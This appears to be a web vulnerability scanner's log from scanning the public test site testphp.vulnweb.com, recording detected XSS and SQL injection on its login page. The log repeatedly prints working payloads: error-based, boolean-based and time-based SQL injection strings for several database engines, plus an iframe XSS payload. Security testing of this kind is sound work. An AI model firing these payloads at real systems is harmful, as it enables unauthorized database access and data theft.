Advanced_payload: ' AND 1=convert(int,@@version)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast((SELECT @@version) as int)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' + convert(int,@@version) + '
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: '); or 1=1 -- -
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' OR (SELECT CASE WHEN (1=1) THEN 'true' ELSE 'false' END) = 'true'--
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' AND IIF(1=1,1,0)--
Advanced_Confidence: 100
------------------------------------------------------------------

handler: common, advanced
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: xss
Detected: True
Common_payload: '"><iframe onload=alert('{{1234**3}}');>
Common_Confidence: 70
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND cast(version() as integer) > 0-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast(chr(126)||version()||chr(126) AS NUMERIC)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=convert(int,@@version)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast((SELECT @@version) as int)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' + convert(int,@@version) + '
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: '); or 1=1 -- -
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' OR (SELECT CASE WHEN (1=1) THEN 'true' ELSE 'false' END) = 'true'--
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' AND IIF(1=1,1,0)--
Advanced_Confidence: 100
------------------------------------------------------------------

handler: common, advanced
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Detected: True
Common_payload: ' OR WAITFOR DELAY "00:00:05"-- 
Common_Confidence: 70
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND cast(version() as integer) > 0-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast(chr(126)||version()||chr(126) AS NUMERIC)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=convert(int,@@version)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast((SELECT @@version) as int)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' + convert(int,@@version) + '
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: '); or 1=1 -- -
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' OR (SELECT CASE WHEN (1=1) THEN 'true' ELSE 'false' END) = 'true'--
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' AND IIF(1=1,1,0)--
Advanced_Confidence: 100
------------------------------------------------------------------

handler: common, advanced
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Detected: True
Common_payload: ' AND SLEEP(5)/*
Common_Confidence: 70
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND cast(version() as integer) > 0-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast(chr(126)||version()||chr(126) AS NUMERIC)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=convert(int,@@version)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast((SELECT @@version) as int)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' + convert(int,@@version) + '
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: '); or 1=1 -- -
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' OR (SELECT CASE WHEN (1=1) THEN 'true' ELSE 'false' END) = 'true'--
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' AND IIF(1=1,1,0)--
Advanced_Confidence: 100
------------------------------------------------------------------

handler: common, advanced
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Detected: True
Common_payload: SLEEP(5) /*' or SLEEP(5) or '" or SLEEP(5) or "*/
Common_Confidence: 60
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND cast(version() as integer) > 0-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast(chr(126)||version()||chr(126) AS NUMERIC)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=convert(int,@@version)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast((SELECT @@version) as int)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' + convert(int,@@version) + '
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: '); or 1=1 -- -
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' OR (SELECT CASE WHEN (1=1) THEN 'true' ELSE 'false' END) = 'true'--
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' AND IIF(1=1,1,0)--
Advanced_Confidence: 100
------------------------------------------------------------------

handler: common, advanced
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Detected: True
Common_payload: "' AND IF(1=1,SLEEP(5),0)--
Common_Confidence: 70
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND cast(version() as integer) > 0-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast(chr(126)||version()||chr(126) AS NUMERIC)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=convert(int,@@version)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast((SELECT @@version) as int)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' + convert(int,@@version) + '
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: '); or 1=1 -- -
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' OR (SELECT CASE WHEN (1=1) THEN 'true' ELSE 'false' END) = 'true'--
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' AND IIF(1=1,1,0)--
Advanced_Confidence: 100
------------------------------------------------------------------

handler: common, advanced
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Detected: True
Common_payload: ' OR pg_sleep(5)
Common_Confidence: 70
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND cast(version() as integer) > 0-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast(chr(126)||version()||chr(126) AS NUMERIC)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=convert(int,@@version)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast((SELECT @@version) as int)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' + convert(int,@@version) + '
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: '); or 1=1 -- -
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' OR (SELECT CASE WHEN (1=1) THEN 'true' ELSE 'false' END) = 'true'--
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' AND IIF(1=1,1,0)--
Advanced_Confidence: 100
------------------------------------------------------------------

handler: common, advanced
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Detected: True
Common_payload: ' || BEGIN DBMS_SESSION.SLEEP(5); END; -- 
Common_Confidence: 70
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND cast(version() as integer) > 0-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast(chr(126)||version()||chr(126) AS NUMERIC)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=convert(int,@@version)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast((SELECT @@version) as int)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' + convert(int,@@version) + '
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: '); or 1=1 -- -
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' OR (SELECT CASE WHEN (1=1) THEN 'true' ELSE 'false' END) = 'true'--
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' AND IIF(1=1,1,0)--
Advanced_Confidence: 100
------------------------------------------------------------------

handler: common, advanced
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Detected: True
Common_payload: ' || BEGIN DBMS_SESSION.SLEEP(5); END; -- 
Common_Confidence: 70
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND cast(version() as integer) > 0-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast(chr(126)||version()||chr(126) AS NUMERIC)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=convert(int,@@version)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast((SELECT @@version) as int)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' + convert(int,@@version) + '
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: '); or 1=1 -- -
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' OR (SELECT CASE WHEN (1=1) THEN 'true' ELSE 'false' END) = 'true'--
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' AND IIF(1=1,1,0)--
Advanced_Confidence: 100
------------------------------------------------------------------
